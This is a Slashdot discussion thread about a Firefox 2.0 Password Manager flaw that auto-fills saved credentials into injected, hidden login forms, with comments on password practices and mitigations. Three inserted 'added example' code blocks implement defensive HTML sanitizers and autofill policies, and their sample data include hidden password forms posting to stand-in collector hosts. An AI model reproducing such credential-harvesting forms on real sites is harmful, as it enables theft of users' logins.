Firefox 2.0 Password Manager Bug Exposes Passwords

Posted by kdawson on Tue Nov 21, 2006 06:25 PM
from the be-careful-out-there dept.
zbuffered writes, "Today, Mozilla made public bug #360493, which exposes Firefox's Password Manager on many public sites. The flaw derives from Firefox's willingness to supply the username and password stored on one page on a domain to another page on a domain. For example, username/password input tags on a Myspace user's site will be unhelpfully propagated with the visitor's Myspace.com credentials. It was first discovered in the wild by Netcraft on Oct. 27. As this proof-of-concept illustrates, because the username/password fields need not be visible on the page, your password can be stolen in an almost completely transparent fashion. Stopgap solutions include avoiding using Password Manager and the Master Password Timeout Firefox extension, which will at least cause a prompt before the fields are filled. However, in the original case detailed in the bug report, the phish mimicked the login.myspace.com site almost perfectly, causing many users to believe they needed to log in. A description of this new type of attack, dubbed the Reverse Cross-Site Request (RCSR) vulnerability, is available from the bug's original author."
  • But but but.... (Score:5, Funny)

    by Anonymous Coward on Tuesday November 21 2006, @06:29PM (#16941742)
    ...secure by design!!
  • passwords have failed (Score:5, Insightful)

    by hackstraw (262471) * on Tuesday November 21 2006, @06:35PM (#16941816)
    (http://www.spamgourmet.com/)

    Now that it's 2006, can we now use a better form of "authentication" than a few ascii characters?

    Every website wants you to have a password. You know, for important stuff like making a purchase because you use a password for a purchase at a brick and mortar store, right?

    Well, since it's a good practice to use unique passwords, and users get forgetful, then they use the web browser tool to store their passwords, then they forget their passwords, and when they use another computer or update their existing one, their tool does not work, and if it does work, then the browser gives away your passwords.

    I don't use a password to get into my home, I don't start my car with a password, I don't use a password to get into my work. In fact, I don't even have a key for my work, server room, nothing (RFID). But all day at work, these programs continually ask for my password to the point that I don't consider my password secure because I have to change it, and use it so much, I'm desensisized (sp?) and say who cares?

    Can we get over passwords soon?

    • Re:passwords have failed by Anonymous Coward (Score:2) Tuesday November 21 2006, @06:45PM
    • Re:passwords have failed (Score:5, Insightful)

      by AlXtreme (223728) on Tuesday November 21 2006, @06:50PM (#16942060)
      (http://www.aperte.nl/ | Last Journal: Monday July 07 2003, @05:11AM)
      I don't use a password to get into my home, I don't start my car with a password, I don't use a password to get into my work. In fact, I don't even have a key for my work, server room, nothing (RFID).
      Locks get picked. Cars get stolen. RFID can be disrupted, tampered with or your card can get stolen (I'm assuming you don't have RFID tags in your arm). Likewise, passwords can be sniffed. Hell, it doesn't matter how good your encryption is, all it takes is a videocamera pointed at your keyboard.

      How far you go, it doesn't matter. There will always be a trade-off between security and convenience. Personally, I trust a good lock more than I trust RFID. But even if you go all the way to biometrics, there will always be a way to hack the system.

      Even so, this Firefox security flaw is a nasty one.

      [ Parent ]
    • Re:passwords have failed (Score:5, Interesting)

      by irc.goatse.cx troll (593289) on Tuesday November 21 2006, @06:51PM (#16942070)
      (Last Journal: Saturday September 20 2003, @01:55PM)
      I strongly hope so. My recommendation would be public key authentication, the way SSH can do it. You'd need a private key (possibly on a crypto card, but a thumbdrive or floppy or whatever works fine) and a password for that. You authenticate to the key when launching your encryption agent, then any website that wants to verify who you are contacts your agent and does the authentication there.

      Infinitely more secure than our current password system, a lot more convenient (think Microsoft Passport's bragged about convenience, except none of your data is stored on a central server), and all around the BetterWay(tm). The main downside is when roaming to another machine if you don't have your key, you don't have access. This can be addressed with either being able to fall back on a password (removing a lot of the security), or some means of authenticating to your home computer.

      You could also add some sort of spec for feeding VCard info into the agent so that sites could use it to do a sort of shared profile feature, where you'd authorize a site to receive certain info and save you a lot of time filling stuff out.

      Unfortunately this is just yet another thing on the list of "tech the way I think it should be", not anything on anyone's todo lists.
      [ Parent ]
    • Re:passwords have failed by Xugumad (Score:2) Tuesday November 21 2006, @06:52PM
    • Re:passwords have failed (Score:5, Insightful)

      by Crudely_Indecent (739699) on Tuesday November 21 2006, @07:02PM (#16942246)
      (http://www.strangehouse.com/ | Last Journal: Friday December 22 2006, @02:19PM)
      Passwords work great for me. I, however, use them with care.

      Any site that uses financial information (my bank, eBay, PayPal, Amazon, or whatever I'm buying, my own servers, etc.) doesn't get the password stored in any form of password manager. On the other hand, inconsequential services like news sites, LUG sites, aquarium discussion groups and the like may have the passwords stored. If it's important, don't store it, don't write it on a post-it note, don't tell your friends.....people cannot be trusted.

      It seems that any security protocol can be circumvented by exploiting the end users who use them poorly or rely on something other than common sense for security.

      It took all of about 5 minutes to explain phishing to my girlfriend. Now, she's almost 1/104358506th as paranoid as I am, which is a good start.

      Now, I'm out of tinfoil......off to the store.
      [ Parent ]
    • Re:passwords have failed by peragrin (Score:2) Tuesday November 21 2006, @07:16PM
    • Re:passwords have failed by Anonymous Coward (Score:1) Tuesday November 21 2006, @07:16PM
    • Re:passwords have failed by baggins2001 (Score:1) Tuesday November 21 2006, @07:43PM
    • Re:passwords have failed by xENoLocO (Score:1) Tuesday November 21 2006, @07:46PM
    • OpenID? by SanityInAnarchy (Score:2) Tuesday November 21 2006, @08:19PM
    • Re:passwords have failed by daeg (Score:2) Tuesday November 21 2006, @08:35PM
    • Re:passwords have failed by Shemmie (Score:1) Tuesday November 21 2006, @08:55PM
    • Re:passwords have failed by Cid Highwind (Score:1) Tuesday November 21 2006, @11:11PM
    • Re:passwords have failed by cerberusss (Score:2) Wednesday November 22 2006, @12:30AM
    • Re:passwords have failed by shellbeach (Score:2) Wednesday November 22 2006, @03:16AM
    • Digital signatures are here today by Per Abrahamsen (Score:2) Wednesday November 22 2006, @03:46AM
    • Re:passwords have failed by Fred_A (Score:2) Wednesday November 22 2006, @11:48AM
  • Is it used? (Score:5, Insightful)

    People actually let their browsers remember their passwords? I have never trusted my browser that much.
    • Re:Is it used? by wumpus188 (Score:2) Tuesday November 21 2006, @06:44PM
    • Re:Is it used? by crabpeople (Score:2) Tuesday November 21 2006, @06:48PM
      • Re:Is it used? (Score:4, Insightful)

        by Phroggy (441) * <slashdot3@phrogg[ ]om ['y.c' in gap]> on Tuesday November 21 2006, @09:42PM (#16944208)
        (http://phroggy.com/)
        Saving passwords should not be a browser feature. I am ashamed that such a big bug could make it into firefox.

        Saving passwords absolutely should be a browser feature; it's a feature I use all the time.

        However, I too am ashamed that such a big bug - or rather, design flaw - could make it into Firefox. I understand the usefulness of being able to use the same saved password information across multiple login forms on one site, but surely someone should have realized the danger here. I mean, these are browser developers. They should have known better.

        Hopefully they'll figure out a solution soon.
        [ Parent ]
        • Re:Is it used? by FLEB (Score:2) Tuesday November 21 2006, @11:03PM
        • Re:Is it used? by P3NIS_CLEAVER (Score:1) Wednesday November 22 2006, @04:06PM
          • Re:Is it used? by Phroggy (Score:2) Wednesday November 22 2006, @10:50PM
    • Not a lot of better options (Score:5, Insightful)

      by Kadin2048 (468275) <slashdot@kadin.xoxy@net> on Tuesday November 21 2006, @06:51PM (#16942068)
      (http://kadin.sdf-us.org/ | Last Journal: Tuesday October 16, @01:46PM)
      If you have 50-100 passwords at various sites, established over years, there's really a shortage of other good options. You can go the old-school route and just write them all down on a pad of paper, or the slightly more sophisticated route and put them in a text file or encrypted database on your local machine, but that doesn't help you when you want to log into a site from another machine.

      I was disappointed to hear of this vulnerability, because I use Google Browser Sync pretty heavily for keeping track of cookies and trivial passwords, and to be honest I'm not really sure what I'd do without it. More important passwords I keep in an old Palm Pilot using a GPLed password-management and generation program on it, but recalling passwords from it is a pain (takes several minutes to get Palm out, type in master password, etc.).
      [ Parent ]
    • Re:Is it used? (Score:4, Interesting)

      by Firehed (942385) on Tuesday November 21 2006, @06:55PM (#16942134)
      (http://www.firehed.net/)
      It's not your own browser to worry about. It's others' browsers. My roommate decided to borrow my machine and was stupid enough to have Firefox remember his password on my machine to the main school portal. No biggie, except that the 'reveal all passwords' button exists (and, last I checked, required no authentication to use).

      Of course, the truly telling moment was when I found out how lame his password is. Not that I'd expect anything different from someone dumb enough to store their password on someone else's computer in the first place.

      So, in other words, passwords continue to be useless for people dumb enough to leave them lying around. I've used the same password for years and it's by no means secure (only just a bit more secure than using my first name) but it's never been an issue for me. The only time I've been concerned is when websites force me to come up with something that fits their requirements, because that means that I do end up writing it down somewhere. The sooner webmasters realize that setting specific requirements for passwords makes them less secure (my bank requires an alphanumeric PW 6-8 letters long with mixed case - that massively narrows down a brute force attack), the better. In the end, most of it comes down to user stupidity, so we might as well not limit the complexity of good users or force them to use something too obscure to remember (or, worse, say 'write this down in a place you can easily access').
      [ Parent ]
      • Re:Is it used? (Score:5, Informative)

        by Odiumjunkie (926074) on Tuesday November 21 2006, @07:25PM (#16942566)
        > No biggie, except that the 'reveal all passwords' button exists (and, last I checked, required no authentication to use).

        Firefox, for as long as I can remember, has allowed you to set a master password, without which the password manager will not populate any password fields and will not allow the viewing of any stored passwords.
        [ Parent ]
        • Re:Is it used? by kjart (Score:2) Wednesday November 22 2006, @05:52AM
      • Re:Is it used? by geekoid (Score:2) Tuesday November 21 2006, @07:37PM
        • Re:Is it used? by Firehed (Score:2) Tuesday November 21 2006, @07:57PM
    • Opera Vulnerable? by JordanL (Score:2) Tuesday November 21 2006, @07:00PM
    • Re:Is it used? by EvanED (Score:1) Tuesday November 21 2006, @07:15PM
    • Re:Is it used? (Score:5, Interesting)

      by makomk (752139) on Tuesday November 21 2006, @07:26PM (#16942578)
      (Last Journal: Friday August 17, @08:29AM)
      I use Konqueror/KWallet to remember most of my passwords. It's encrypted (requires a password to access), only fills in the forms on the page you originally hit "Save Password" on (inconvenient, but helps reduce the security issues), and closes the wallet (requiring re-entry of the password) when I lock my screen, my screensaver starts up, or after 10 minutes of non-use of the wallet. Slightly paranoid compared to Firefox, but it works.
      [ Parent ]
    • Re:Is it used? by kosmosik (Score:2) Tuesday November 21 2006, @07:37PM
    • Re:Is it used? by Tumbleweed (Score:2) Tuesday November 21 2006, @08:12PM
    • Re:Is it used? by Kanasta (Score:2) Tuesday November 21 2006, @09:17PM
    • Re:Is it used? by Jugalator (Score:2) Wednesday November 22 2006, @01:47AM
  • just update it? (Score:2)

    by diegocgteleline.es (653730) on Tuesday November 21 2006, @06:36PM (#16941822)
    Stopgap solutions are not a solution, I guess they're planning a 2.0.1 soon? The bug has been reported 10 days ago...
  • Arrrrr (Score:4, Insightful)

    by Peyna (14792) on Tuesday November 21 2006, @06:36PM (#16941834)
    (http://csilo.com/)
    The flaw derives from Firefox's willingness to supply the username and password stored on one page on a domain to another page on a domain.

    Worst idea ever. The question isn't why wasn't this discovered earlier, but who decided this was a good idea in the first place?
    • Re:Arrrrr by LunaticTippy (Score:2) Tuesday November 21 2006, @06:43PM
    • Re:Arrrrr by sweatyboatman (Score:2) Tuesday November 21 2006, @06:44PM
    • Re:Arrrrr (Score:5, Insightful)

      by jesser (77961) on Tuesday November 21 2006, @06:58PM (#16942172)
      (http://www.squarefree.com/ | Last Journal: Saturday August 09 2003, @09:27PM)
      When browsers added password management features 5 (?) years ago, there weren't a lot of sites that required passwords, included user-generated content, and allowed that user-generated content to include password fields. But there were (and still are) many sites where loading just about any URL on the site could give you a "you need to log in" page.

      I'd be perfectly happy with this becoming part of the accepted security model for web applications, just like "don't let user-generated content include SCRIPT tags with arbitrary content".
      [ Parent ]
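The rule proposed in the comment above, treating login-form markup in user-generated content the way SCRIPT tags are treated, can be enforced with a strict tag allowlist. This is an added example, not code from Slashdot, Myspace or Mozilla; the allowed tag set, the function names and the sample profile text are assumptions constructed for illustration.

```javascript
// Added example: allowlist sanitizer for user-authored markup.
// Strategy: escape everything, then restore only bare allowlisted tags,
// so <form>, <input>, attributes and event handlers can never survive.

// Assumed site policy: these tags only, and never with attributes.
const ALLOWED_TAGS = ["b", "i", "em", "strong", "p", "br", "blockquote"];
const VOID_TAGS = new Set(["br"]);

// Constructed sample: a profile blurb that embeds a login form.
const SAMPLE_PROFILE =
  'Nice <b>photos</b>!<form><input name="username">' +
  '<input type="password" name="password"></form><i>unclosed';

function escapeHtml(text) {
  return text
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Matches an escaped tag with no attributes: &lt;b&gt;, &lt;/b&gt;, &lt;br /&gt;
const BARE_TAG = new RegExp(
  "&lt;(/?)(" + ALLOWED_TAGS.join("|") + ")\\s*/?&gt;", "gi");

function sanitizeUserHtml(input) {
  const open = []; // stack of currently open allowlisted tags
  const body = escapeHtml(input).replace(BARE_TAG, (_m, slash, rawName) => {
    const name = rawName.toLowerCase();
    if (VOID_TAGS.has(name)) return slash ? "" : `<${name}>`;
    if (!slash) {
      open.push(name);
      return `<${name}>`;
    }
    const idx = open.lastIndexOf(name);
    if (idx === -1) return ""; // stray closing tag: drop it
    // Close everything opened after it so nesting stays well-formed.
    return open.splice(idx).reverse().map((n) => `</${n}>`).join("");
  });
  // Close whatever the author left open so it cannot restyle the page.
  return body + open.reverse().map((n) => `</${n}>`).join("");
}

// Heuristic for a moderation queue or log line: did the raw submission try
// to include form controls? The sanitizer above is the actual control.
function flagsCredentialMarkup(input) {
  return /<\s*(form|input|button|textarea|select)\b/i.test(input);
}

console.log(sanitizeUserHtml(SAMPLE_PROFILE));
console.log("flag for review:", flagsCredentialMarkup(SAMPLE_PROFILE));
```

With this policy the embedded form is rendered as inert text, so a password manager has no field to fill on the user-authored page.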
      • Re:Arrrrr by John Hasler (Score:2) Tuesday November 21 2006, @08:54PM
      • Re:Arrrrr by shaka (Score:2) Wednesday November 22 2006, @07:45AM
    • Re:Arrrrr by (H)elix1 (Score:2) Tuesday November 21 2006, @07:16PM
  • by Andy_R (114137) on Tuesday November 21 2006, @06:39PM (#16941870)
    (http://slashdot.org/ | Last Journal: Friday October 01 2004, @07:19AM)
    According to the Bugzilla link, this bug is also present in pre 2.0 releases of Firefox, and IE 6/7.

    So much for me being smug about going back to Firefox 1.5!
  • stopgap measures include... (Score:4, Funny)

    by Gary W. Longsine (124661) on Tuesday November 21 2006, @06:39PM (#16941876)
    (http://intrinsicsecurity.com/ | Last Journal: Sunday August 28 2005, @11:11AM)
    ...using Microsoft Internet Explorer. AAaaaaaaaaaaaargh!
  • i used that one (Score:1, Troll)

    by User 956 (568564) on Tuesday November 21 2006, @06:42PM (#16941918)
    (http://www.atomjax.com/)
    A description of this new type of attack, dubbed the Reverse Cross-Site Request (RCSR) vulnerability

    I used that one on my girlfriend. I believe it's also called the "Dirty Sanchez".
  • Meh ... (Score:1)

    by Purity Of Essence (1007601) on Tuesday November 21 2006, @06:43PM (#16941930)
    My feeling is, people who rely on "password managers" get what they deserve when their passwords end up in the wrong hands. It's generally just a bad idea to store passwords anywhere but your head.
    • Re:Meh ... by Jamu (Score:2) Tuesday November 21 2006, @07:33PM
    • Re:Meh ... by Propaganda13 (Score:2) Tuesday November 21 2006, @07:37PM
  • Dis-satisfied with v2.0 (Score:4, Informative)

    by macdaddy (38372) on Tuesday November 21 2006, @06:45PM (#16941984)
    (http://slashdot.org/ | Last Journal: Monday January 31 2005, @05:48PM)
    I don't know about everyone else but I am generally dis-satisfied with v2.0. Frankly I felt that the memory leak in FF was significantly amplified in 2.0. I noticed back on 1.5 that every time I put my laptop into standby with FF running and then woke it up that FF would slowly increase its memory consumption to about 30% more than what it was before being put into standby. Ie, if it was 100MB when it went to standby it would be around 130MB after waking the laptop, switching focus to FF, and clicking through my opened tabs. In FF 2.0 I have to literally shutdown FF every day or two or FF will easily consume upwards of 500MB of my RAM. I usually have about a dozen windows open and in each window I have 5-15 tabs. That's a fair bit but it didn't cause me much grief in v1.5.

    It also took me a while to figure out how to remove the close button from each tab [wordpress.com]. The tab scrolling "feature" was also a point of great annoyance that took up more of my time to find a fix [lifehacker.com].

    In short I'm just not jumping for joy over FF. This new flaw happens to come to light the day after I search Google for a way to manually add userids and passwords to the FF DB (any ideas?). This was to address the problem of FF not picking up some text fields as userid and password fields. One solution I found was RoboForm [roboform.com], though I'm not sure I want to pay for what I think should be a fairly easy thing to do inside FF. FF is getting better but personally I'd rather be using Mozilla 1.7.x.

  • by GenKreton (884088) on Tuesday November 21 2006, @06:46PM (#16941996)
    (Last Journal: Sunday April 01 2007, @08:10AM)
    I love firefox and am very thankful for it being opensource but I loathe how Mozilla chooses to track and report bugs. I have been going around for days and could've been exploited - possibly but not probably - instead of being able to take appropriate measures to protect myself. It's not like this was some little secret the code was already out in the wild to do it. I find this security through obscurity in opensource projects absolutely disgusting. While we are possibly getting compromised they are sitting on their hands. We, the community, are here to quickly fix problems like these too. Thousands of developers could've and would work on this who the bug was hidden from. This makes the development process absolutely useless...
  • I thought the rule of thumb for any user-created content was to never allow freeform html? You either let them control their formatting with a separate markup (like BBCode), or you limit them to specific tags (like they do here). In neither of these situations is this exploit possible.

    Allowing full html coding, including embedding java or javascript, is an invitation for the unscrupulous. That's one of the 500 reasons I can think of to never visit a website like myspace.

    That said, much like language, the web is defined by its users. While I don't feel like it's Firefox's responsibility to fix issues like this, they'd do best to be aware of it. It wouldn't be a bad idea at all to tie password remembering to the exact url (at least everything up to the "?") by default.
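The comment above suggests tying a saved password to the exact URL up to the "?". The following added example (not Firefox code) models that policy next to the host-only matching described in the story summary. The hosts, paths and saved-login record are constructed sample data, and the third policy, which also checks where the form submits, is an assumption added here for comparison and does not come from the thread.

```javascript
// Added example: a model of three autofill policies, not Firefox's implementation.
// Hosts, paths and the saved-login record are constructed sample data.

// Where the login was captured and where that form submitted.
const savedLogin = {
  pageUrl: "https://social.example.test/index.cfm?fuseaction=login",
  submitUrl: "https://social.example.test/auth",
};

// Forms the browser meets later on the same host (constructed).
const forms = [
  { label: "genuine login page",
    pageUrl: "https://social.example.test/index.cfm?fuseaction=login&next=home",
    action: "/auth" },
  { label: "session-expired prompt elsewhere on the site",
    pageUrl: "https://social.example.test/messages/inbox",
    action: "https://social.example.test/auth" },
  { label: "login form inside a user-authored profile",
    pageUrl: "https://social.example.test/profiles/12345",
    action: "https://collector.example.net/save" },
];

// Everything up to the "?", as the comment suggests.
function pageKey(url) {
  const u = new URL(url);
  return u.origin + u.pathname;
}

const policies = {
  // Behaviour described in the summary: any page on the host gets the fill.
  hostOnly(saved, form) {
    return new URL(form.pageUrl).host === new URL(saved.pageUrl).host;
  },
  // The comment's suggestion: fill only on the page where it was saved.
  exactPage(saved, form) {
    return pageKey(form.pageUrl) === pageKey(saved.pageUrl);
  },
  // Assumed alternative: same host, and the form must submit to the
  // origin the credentials were originally sent to.
  hostAndSubmitTarget(saved, form) {
    const target = new URL(form.action, form.pageUrl); // resolves relative actions
    return policies.hostOnly(saved, form) &&
      target.origin === new URL(saved.submitUrl).origin;
  },
};

// Returns, per policy, the labels of the forms that would be auto-filled.
function comparePolicies() {
  const result = {};
  for (const [name, allows] of Object.entries(policies)) {
    result[name] = forms
      .filter((form) => allows(savedLogin, form))
      .map((form) => form.label);
  }
  return result;
}

console.log(comparePolicies());
```

Exact-page matching blocks the user-authored form but also stops filling the legitimate session-expired prompt, which is the convenience trade-off raised earlier in the thread.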
  • That is Scary (Score:2, Informative)

    That is disturbing to me since I use FF2 to store many of my passwords. However, I don't store passwords for more critical sites, like my bank's website. I recommend others do the same.
  • Waiting for FF 3.0 (Score:1)

    by tcolberg (998885) on Tuesday November 21 2006, @06:56PM (#16942148)
    I am still using FF1.5 because of all the problems with 2.0. Not just bugs like these, although they are disappointing, but reports of the ever present memory leak and the annoying revamps to the tabs bar. Then again, I am eagerly looking forward to upgrade to a better version so I can get some of the improvements, like crash restoration.
  • The patch... (Score:1)

    by alyawn (694153) on Tuesday November 21 2006, @07:01PM (#16942216)
    (http://everydaycoder.com/)
    And where's the patch for this? If the bug was hidden from all, then why would they go public with it without a patch? And why would they hide it in the first place? Open source developers could have submitted patches already!
  • by caseih (160668) on Tuesday November 21 2006, @07:05PM (#16942278)
    There is a neat little piece of javascript at http://www.xs4all.nl/~jlpoutre/BoT/Javascript/PasswordComposer/ [xs4all.nl] that lets you just think up a master password in your head and then use this applet to automatically generate a site-specific, unique hash and fill in the password field automatically. This way you can remember the passwords easily, you never have to save them or write them down. And if one site gets compromised, that password (the hash) won't work with any other site. The drawback is that if you don't have this piece of javascript then you can't get into your sites.
  • Obligatory disclaimer! (Score:2, Funny)

    by FaustIN (1030298) <`faustinroman' `at' `gmail.com'> on Tuesday November 21 2006, @07:10PM (#16942342)
    Aha!... that's why sometimes I don't remember posting bad language comments!

    Thought until now of multiple personality but mystery solved! It was just my browser!...

    PS: I shall not be held accountable for ANY of my comments...

  • by ewl1217 (922107) on Tuesday November 21 2006, @07:10PM (#16942362)
    Does anyone know if Konqueror (using KDE Wallet) is affected? And what about other browsers, like Opera, Epiphany, and so on? I'd just like to know how common this type of exploit is.
  • software level bug (Score:1)

    by HAL9000_mirror (1029222) on Tuesday November 21 2006, @07:26PM (#16942576)
    While I agree FF should alert the user, this is not a hole in FF's security architecture. It's rather a software level bug. Moral of the story: 1. don't be lazy and ask your browser to remember your password. 2. if you insist to be lazy, store passwords only for trivial web accounts.
  • WARNING (Score:4, Informative)

    by tezbobobo (879983) on Tuesday November 21 2006, @07:35PM (#16942732)
    (http://www.members.iinet.net.au/~tezbo | Last Journal: Thursday June 09 2005, @10:20AM)
    DEERPARK 1.5.0.4 is also vulnerable - based on firefox 1.5
  • Great! (Score:1)

    by Philnet.HFZ (923313) on Tuesday November 21 2006, @07:39PM (#16942802)
    (http://philhost.selfip.net/)
    No big deal. Since I use Thunderbird to check my email, and I don't pay for anything, there's nothing worth stealing. "OH NOES! SOMEONEZ HAX0R3D MY YTMND PASSWORD! T3H W0R1D IS 3ND1NG!!!!!!111one1" Seriously, all my important passwords (such as my Slashdot password), are stored in the most important place available: my brain. I figure, "If I can't remember the password for this site, this site is obviously inferior and not worthy of my attention!"
    • Re:Great! by LordEd (Score:1) Tuesday November 21 2006, @09:37PM
  • Credit card numbers are stored too. (Score:2, Informative)

    by GigsVT (208848) on Tuesday November 21 2006, @07:51PM (#16942968)
    (Last Journal: Saturday June 30, @01:22AM)
    If you have form autocomplete on, credit card numbers are stored in plaintext on your hard disk too. Bug's been open for .. what about 4 years now.

    They refuse to fix it, they say it's not a bug.

    I don't think it's vulnerable to this because it's not fully automatic, however, all someone has to do to get your credit card number is type the first digit and it'll fill in the rest.

    Their advice, "Don't use autocomplete".
  • didn't work for me (Score:1)

    by naph (590672) on Tuesday November 21 2006, @07:52PM (#16942990)
    (http://rod.pu-gh.com/ | Last Journal: Thursday October 26 2006, @10:58AM)
    i'm using firefox 2.0 on linux, first my popup blocker would allow the site to open when i clicked on the video like the instructions said, then when i allowed it i just got youtube.com?
  • Come on... (Score:1, Insightful)

    by Anonymous Coward on Tuesday November 21 2006, @07:55PM (#16943038)
    Just remember your freaking passwords in your head, is it that hard?

    • Re:Come on... by Jugalator (Score:2) Wednesday November 22 2006, @01:49AM
      • Re:Come on... by Safiire Arrowny (Score:2) Wednesday November 22 2006, @03:19AM
  • by natet (158905) on Tuesday November 21 2006, @07:55PM (#16943060)
    I for one only use the browser's store password feature for the most trivial of sites. For more important sites, I use Password Safe [sourceforge.net]. The program and the database fit easily on a thumb drive, and requires a master password to access. It has a user configurable time out, and a double click on an account copies the data to the clipboard for later use, allowing you to foil keyboard based sniffers.
  • I'm using Opera 9.02 under Linux (Kubuntu 6.10), and could not get the proof-of-concept to work with Wand (Opera's Password Management). I don't think this would be much of an issue with any browser, though, if people would just use some common sense and not store passwords for important things like online banking. While it might suck to have someone exploit this for your Slashdot account and start trolling using your UID, it would be nothing more than an inconvenience. Online banking and credit card transactions, on the other hand, would be major problems. So really, this is a non-issue if you are already a security-minded person. The question: How many normal users are security-minded? The answer is, unfortunately, rather obvious, I think.
  • by liftphreaker (972707) on Tuesday November 21 2006, @09:04PM (#16943840)
    Opera, my one true love... I shall never leave thee.
  • Thank God! (Score:3, Funny)

    I have MS password management to control access to my Firefox password manager.

    Phew!
  • Password safety (Score:3, Informative)

    by Pedrito (94783) on Tuesday November 21 2006, @09:11PM (#16943922)
    (http://www.petedavis.net/)
    I have two types of passwords: The ones for fluff sites, like Slashdot, Wikipedia, hotmail (a.k.a. Spam box), and so forth, which usually get 1 of 2 passwords. Then for banks and credit cards and what have you, I use real passwords with different ones for each site.

    I could care less if someone hacks my Slashdot account or my wikipedia account. The worst thing they can do is vandalize under my name. And as for hotmail, they can have my spam. And were I to have a myspace account, I could care less if someone got that too.

    Fortunately, my bank and credit card companies don't allow others to create their own pages, so I'm not too concerned. I suspect this will get fixed long before it becomes a concern for me.
  • Hey (Score:2)

    by Ant P. (974313) <anthony.parsons@manx.net> on Tuesday November 21 2006, @09:17PM (#16943978)
    I was poking around a few days ago trying to get a userContent.css file to use a local filesystem png file as a background, without having to resort to huge data: URIs.
    Eventually I'd thrown enough random ideas at the problem that I ended up finding out about this nightmare waiting to happen [mozilla.org]. Just for kicks I tried putting some code in the CSS to alert() all the (supposedly hidden) password values on the page. It worked.
    • Re:Hey by higuita (Score:1) Wednesday November 22 2006, @07:26AM
      • Re:Hey by Ant P. (Score:2) Wednesday November 22 2006, @11:54AM
        • *sigh* by Ant P. (Score:2) Wednesday November 22 2006, @02:33PM
  • I don't mind that the program allows me to be stupid. Big deal...... I do mind however things like drive by hacks, (via activeX) cross-site scripting (ala JavaScript) etc. But do I expect the browser to be my mommy.... NO As for the supposed FF memory leak. That isn't the one that should affect you the most.... Cerebellum Memorus Diareatalis should.
  • PassPet (Score:1)

    by serial_crusher (591271) on Tuesday November 21 2006, @10:39PM (#16944716)
    PassPet [passpet.org] is a nifty looking extension that hasn't actually been developed. Would help with this problem, as you have to actually click a button to fill in your password.
  • by Vexorian (959249) on Tuesday November 21 2006, @11:18PM (#16944994)
    It all sounds that this is a whole bug with Javascript (again), and XSS in a trusted site, for god's sake people if someone can make a domain run whatever javascript code he wants they can just steal your cookies.

    I would love to test whether it works when firefox is using the noscript addon, but I cannot, because I don't use the password manager, it is just retarded to let your browser remember your passwords, really.

  • by saleenS281 (859657) on Tuesday November 21 2006, @11:32PM (#16945116)
    (http://www.liquidshells.net/)
    The Firefox team's real intent here was to keep all the geeks off myspace, or any "social networking site" for that matter. Shame on all of you for not knowing better!
  • by hullabalucination (886901) on Tuesday November 21 2006, @11:39PM (#16945154)
    (Last Journal: Friday August 18 2006, @01:49PM)

    Not sure I understand what's supposed to happen. After clicking on the vid (on Chapin Information Service's demo), am I supposed to automatically go to Google? Chapin's demo exploit seems to tell me that I would be redirected to Google.com. It didn't...it went to YouTube where I was logged in under my normal user:pass. I didn't see any sign of anything in the address bar revealing my Chapin user:pass. Is the fact that I already had a YouTube account registered with Password Manager what caused the exploit to fail? Also, my popup blocker stopped Chapin's site from launching something first time through. Was this what threw a wrench in it? I tried manually going to Google.com immediately after clicking on the vid another time through (registering the same user:pass as the first time), but I just don't see anything to indicate that the exploit worked (my user:pass from the demo appears in Google's address bar? Not that I could see.). Can someone please explain in a bit more detail what should have happened? Mozilla's exploit demo seemed to fail as well, dumping me on a "server not found" error page, but maybe that's what it's supposed to do if the exploit worked.

    Tried the second demo on Mozilla's bugtracker. My popup blocker stopped a new window from launching. Nothing else happened that I could tell.

    Appreciation expressed in advance to anyone who can enlighten me on what I should be experiencing in Firefox 2. Is this a Windows-version-only thing? I'm on Fedora Core 5.

    * * * * *

    All mankind is divided into three classes: those that are immovable, those that are movable, and those that move.
    --Benjamin Franklin

  • myspace... (Score:3, Informative)

    by DeadboltX (751907) on Wednesday November 22 2006, @05:43AM (#16947128)
    It is not a bug with firefox, it is a bug with myspace.
    I doubt you will find many places other than myspace where this "bug" will be exploited. Why? Because most sites that host user generated content are responsible enough to remove the user's ability to post potentially-malicious markup language on the site. These sites strip almost all (if not all) markup and only allow a small handful of decoration tags like BOLD. (Slashdot is a perfect example of allowed html markup)

    The problem is that the code on myspace is shoddy at best, and the fact that users can put any kind of html on their myspace page was an accidental result of such. Then when users figured out they could customize their page with css and other markup code they were happy, and so myspace left it in.
    Nowadays everyone is so used to myspace letting them customize their page (in a shitty hack sort of way) that if they were to take that aspect away I think myspace would die in a month (I know a lot of girls who only go on myspace so that they can upgrade their page and make it look better by customizing it) so they are not likely to ditch this "feature" of their site.
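
An added example, not part of the comment above or of any site's real code: a minimal allowlist sanitizer of the kind the comment describes, which keeps a few decoration tags, copies no attributes, and drops form and input tags entirely. The allowlist, the sample markup and the `collector.example` host are assumptions made for illustration.

```python
from html import escape
from html.parser import HTMLParser

ALLOWED = {"b", "i", "em", "strong", "p", "br", "blockquote"}  # assumed allowlist
VOID = {"br"}                       # allowed tags that take no closing tag
DROP_CONTENT = {"script", "style"}  # text inside these is discarded as well

# Constructed input: a profile snippet carrying an injected login form.
SAMPLE = ('<b>hi</b><form action="https://collector.example/c">'
          '<input name="username"><input type="password" name="password" '
          'style="display:none"></form><script>x()</script> bye')


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.open_tags, self.skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1
        elif tag in ALLOWED and not self.skip:
            self.out.append(f"<{tag}>")      # attributes are never copied
            if tag not in VOID:
                self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif tag in self.open_tags and not self.skip:
            while self.open_tags:            # also close tags left open inside
                closed = self.open_tags.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data))    # text is re-escaped on output


def sanitize(markup):
    """Return markup reduced to allowlisted, attribute-free tags."""
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    tail = "".join(f"</{t}>" for t in reversed(parser.open_tags))
    return "".join(parser.out) + tail


if __name__ == "__main__":
    print(sanitize(SAMPLE))
```
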

  • FF problems (Score:2)

    by mapkinase (958129) on Wednesday November 22 2006, @07:02AM (#16947688)
